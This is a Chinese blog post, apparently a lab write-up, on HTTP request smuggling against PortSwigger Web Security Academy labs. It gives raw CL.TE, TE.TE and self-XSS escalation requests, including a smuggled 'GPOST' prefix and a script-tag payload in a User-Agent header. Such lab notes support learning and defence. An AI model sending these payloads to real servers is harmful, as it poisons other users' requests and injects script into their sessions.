<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  

  
  <title>http协议走私实验 | Runtest</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  
  
  <meta name="description" content="实验前提：   1代理服务器和后端服务器重用TCP连接   2两个服务器实现RFC的标准不一样，代理服务器和后端服务认可的请求头不一样   参考链接：https://portswigger.net/web-security/request-smuggling 0x01 CL.TE这里是走私的是x，末尾不加换行在实验中也可以达到走私的效果数据包 POST / HTTP/1.1Host: ac791f">
<meta property="og:type" content="article">
<meta property="og:title" content="http协议走私实验">
<meta property="og:url" content="http://yoursite.com/2020/03/02/http协议走私实验/index.html">
<meta property="og:site_name" content="Runtest">
<meta property="og:description" content="实验前提：   1代理服务器和后端服务器重用TCP连接   2两个服务器实现RFC的标准不一样，代理服务器和后端服务认可的请求头不一样   参考链接：https://portswigger.net/web-security/request-smuggling 0x01 CL.TE这里是走私的是x，末尾不加换行在实验中也可以达到走私的效果数据包 POST / HTTP/1.1Host: ac791f">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://i.loli.net/2020/03/02/9cfUs6zqLxnRrAd.png">
<meta property="og:image" content="https://i.loli.net/2020/03/02/9cfUs6zqLxnRrAd.png">
<meta property="og:image" content="https://i.loli.net/2020/03/02/jZCxBVq1oS5zOLF.png">
<meta property="og:image" content="https://i.loli.net/2020/03/02/523dDICKRQbjUxL.png">
<meta property="og:image" content="https://i.loli.net/2020/03/02/HNiUQpMPqRc2f9k.png">
<meta property="og:updated_time" content="2020-03-09T14:58:27.145Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="http协议走私实验">
<meta name="twitter:description" content="实验前提：   1代理服务器和后端服务器重用TCP连接   2两个服务器实现RFC的标准不一样，代理服务器和后端服务认可的请求头不一样   参考链接：https://portswigger.net/web-security/request-smuggling 0x01 CL.TE这里是走私的是x，末尾不加换行在实验中也可以达到走私的效果数据包 POST / HTTP/1.1Host: ac791f">
<meta name="twitter:image" content="https://i.loli.net/2020/03/02/9cfUs6zqLxnRrAd.png">
  
    <link rel="alternate" href="/atom.xml" title="Runtest" type="application/atom+xml">
  
  
    <link rel="icon" href="/images/default-avatar.jpg">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/css/highlight.css">
  <script>
  let antiquityStorage = window.sessionStorage.getItem('antiquitySessionStorage');
  if (antiquityStorage == '' || antiquityStorage == null) {
    var antiquityLoader = '<div id="loaderbox"><div class="loader"><div class="load-roll"><div class="load-top"></div><div class="load-right"></div><div class="load-bottom"></div></div></div></div>';
    document.write(antiquityLoader);
    document.body.style.overflow = 'hidden'
  }
  </script>
</head>
</html>
<body>
  <div id="fullpage" class="mobile-nav-right">
    
      <div id="wrapper" style="background-image: url(/images/test.jpg)" title="为了更安全的互联网">
    
    
      <header id="header">
  <div id="nav-toggle" class="nav-toggle"></div>
  <div class="head-box global-width">
    <nav class="nav-box nav-right">
      
        <a class="nav-item" href="/" title
        
        >首页</a>
      
        <a class="nav-item" href="/archives" title
        
        >归档</a>
      
    </nav>
  </div>
</header>
      <div id="middlecontent" title class="global-width sidebar-right">
        <section id="main"><article id="post-http协议走私实验" class="article global-container article-type-post" itemscope itemprop="blogPost">
  
    <header class="article-header">
      
  
    <h1 class="article-title" itemprop="name">
      http协议走私实验
    </h1>
  

    </header>
  
  <div class="article-meta">
    <a href="/2020/03/02/http协议走私实验/" class="article-date">
  <time datetime="2020-03-02T14:25:16.000Z" itemprop="datePublished">2020-03-02</time>
</a>
    
    
  </div>
  
    <span id="busuanzi_container_page_pv">
      本文总阅读量<span id="busuanzi_value_page_pv"></span>次
    </span>
  

  <div class="article-inner">
    
    <div class="article-content article-content-cloud" itemprop="articleBody">
      
        <h3 id="实验前提："><a href="#实验前提：" class="headerlink" title="实验前提："></a>实验前提：</h3><p>   1代理服务器和后端服务器重用TCP连接<br>   2两个服务器实现RFC的标准不一样，代理服务器和后端服务认可的请求头不一样<br>   参考链接：<a href="https://portswigger.net/web-security/request-smuggling" target="_blank" rel="noopener">https://portswigger.net/web-security/request-smuggling</a></p>
<h3 id="0x01-CL-TE"><a href="#0x01-CL-TE" class="headerlink" title="0x01 CL.TE"></a>0x01 CL.TE</h3><p>这里是走私的是x，末尾不加换行在实验中也可以达到走私的效果<br><img src="https://i.loli.net/2020/03/02/9cfUs6zqLxnRrAd.png" alt="45258497-16C1-45A3-AB42-CA26127EDE6B.png"><br>数据包</p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: ac791f911ff1f48680494caa002e000d.web-security-academy.net</span><br><span class="line">Connection: keep-alive</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9,en;q=0.8</span><br><span class="line">Cookie: session=JbGzWAoyZbXDrfwW0AZoCwScSQLBZ87V</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 6</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">0</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">x</span><br></pre></td></tr></table></figure></div>

<h3 id="0x02-TE-CL"><a href="#0x02-TE-CL" class="headerlink" title="0x02 TE.CL"></a>0x02 TE.CL</h3><p><img src="https://i.loli.net/2020/03/02/9cfUs6zqLxnRrAd.png" alt="45258497-16C1-45A3-AB42-CA26127EDE6B.png"><br>浏览器<br><img src="https://i.loli.net/2020/03/02/jZCxBVq1oS5zOLF.png" alt="2864F13B-3EA9-4CEF-9387-3DA613B42723.png"></p>
<h3 id="0x03-TE-TE"><a href="#0x03-TE-TE" class="headerlink" title="0x03 TE.TE"></a>0x03 TE.TE</h3><p>重点 ：前端服务器和后端服务器都支持Transfer-Encoding标头，但是可以通过对标头进行某种方式的混淆来诱导其中一台服务器不对其进行处理。<br><img src="https://i.loli.net/2020/03/02/523dDICKRQbjUxL.png" alt="2A0C6ABF-E471-49D7-A5E8-0B6DF9F2B30E.png"></p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: your-lab-id.web-security-academy.net</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-length: 4</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">5c</span><br><span class="line">GPOST / HTTP/1.1</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 15</span><br><span class="line"></span><br><span class="line">x=1</span><br><span class="line">0</span><br></pre></td></tr></table></figure></div>

<h3 id="0x04-CL-TE将self-xss危害放大"><a href="#0x04-CL-TE将self-xss危害放大" class="headerlink" title="0x04 CL.TE将self-xss危害放大"></a>0x04 CL.TE将self-xss危害放大</h3><p>原理：走私可触发反射xss的请求头，等待受害者拼接走私的这个请求，并相应，导致无强交互的情况下执行xss代码<br>效果图：正常用户访问此网站</p>
<p><img src="https://i.loli.net/2020/03/02/HNiUQpMPqRc2f9k.png" alt="CECA1062-45C7-4DBA-9F7A-7E898F00E3FA.png"></p>
<div class="highlight-box"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: ac7a1ffb1e5f8c5080e30b5f0061000d.web-security-academy.net</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36</span><br><span class="line">Sec-Fetch-Dest: document</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line">Sec-Fetch-Site: same-origin</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line">Referer: https://ac7a1ffb1e5f8c5080e30b5f0061000d.web-security-academy.net/</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9,en;q=0.8</span><br><span class="line">Cookie: session=jd0lNFQCxLsyVysTaPA1YAEKO9STVbKr</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line">Content-Length: 123</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">0</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">GET /post?postId=2 HTTP/1.1</span><br><span class="line">User-Agent: &quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;#</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure></div>

<p>如何发挖掘类漏洞：<br><a href="https://portswigger.net/web-security/request-smuggling/finding" target="_blank" rel="noopener">https://portswigger.net/web-security/request-smuggling/finding</a></p>

      
    </div>
    
      <footer class="article-footer">
        完
      </footer>
    
  </div>
  
    
<nav id="article-nav">
  <div class="article-nav-block">
    
      <a href="/2020/03/04/菜鸡版java反序列化漏洞学习/" id="article-nav-newer" class="article-nav-link-wrap">
        <strong class="article-nav-caption"></strong>
        <div class="article-nav-title">
          
            菜鸡版java反序列化漏洞学习
          
        </div>
      </a>
    
  </div>
  <div class="article-nav-block">
    
      <a href="/2020/02/11/Activity及Intent/" id="article-nav-older" class="article-nav-link-wrap">
        <div class="article-nav-title">Activity及Intent</div>
        <strong class="article-nav-caption"></strong>
      </a>
    
  </div>
</nav>

    
<div id="gitmentContainer"></div>
<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
<script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>
<script>
var gitment = new Gitment({
  owner: '',
  repo: '',
  oauth: {
    client_id: '',
    client_secret: '',
  },
})
gitment.render('gitmentContainer')
</script>

  
  
</article>
</section>
        <aside id="sidebar">
  
    <div class="widget-box">
  <div class="avatar-box">
    <img class="avatar" src="/images/code-title.png" title="为了更安全的互联网"></img>
    <h3 class="avatar-name">
      
        泰斯特
      
    </h3>
    <p class="avatar-slogan">
      搬砖工程师。
    </p>
  </div>
</div>


  
    

  
    

  
    
  
    
  <div class="widget-box">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">February 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/01/">January 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a></li></ul>
    </div>
  </div>

  
    
  <div class="widget-box">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/03/04/菜鸡版java反序列化漏洞学习/">菜鸡版java反序列化漏洞学习</a>
          </li>
        
          <li>
            <a href="/2020/03/02/http协议走私实验/">http协议走私实验</a>
          </li>
        
          <li>
            <a href="/2020/02/11/Activity及Intent/">Activity及Intent</a>
          </li>
        
          <li>
            <a href="/2020/02/11/Android布局及控件/">Android布局及控件</a>
          </li>
        
          <li>
            <a href="/2020/02/08/NDK-Build-方式实现JIN/">NDK-Build 方式实现JIN</a>
          </li>
        
      </ul>
    </div>
  </div>

  
      <div class="widget-box">
    <h3 class="widget-title">友链</h3>
    <div class="widget">
      
        <a style="display: block;" href="https://blog.ssssdl.xyz/" title target='_blank'
        >ssssdl</a>
      
        <a style="display: block;" href="https://lingwu111.github.io/" title target='_blank'
        >lingwu</a>
      
        <a style="display: block;" href="http://blog.0xccc.cc/" title target='_blank'
        >canxiao</a>
      
        <a style="display: block;" href="http://www.vkxss.top/" title target='_blank'
        >Vk</a>
      
        <a style="display: block;" href="https://syst1m.com/" title target='_blank'
        >syst1m</a>
      
    </div>
  </div>

  
</aside>
      </div>
      <footer id="footer">
  <div class="foot-box global-width">
    &copy; 2020 test &nbsp;&nbsp;
    Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    &nbsp;|&nbsp;主题 <a href="https://github.com/yiluyanxia/hexo-theme-antiquity">antiquity</a>
    <br>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span id="busuanzi_container_site_pv">不蒜子告之   阁下是第<span id="busuanzi_value_site_pv"></span>个访客</span>
  </div>
</footer>
      <script src="https://code.jquery.com/jquery-2.0.3.min.js"></script>
<script>
if (!window.jQuery) {
var script = document.createElement('script');
script.src = "/js/jquery-2.0.3.min.js";
document.body.write(script);
}
</script>

  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



    </div>
    <nav id="mobile-nav" class="mobile-nav-box">
  <div class="mobile-nav-img mobile-nav-top"></div>
  
    <a href="/" class="mobile-nav-link">首页</a>
  
    <a href="/archives" class="mobile-nav-link">归档</a>
  
  <div class="mobile-nav-img  mobile-nav-bottom"></div>
</nav>    
  </div>
</body>
</html>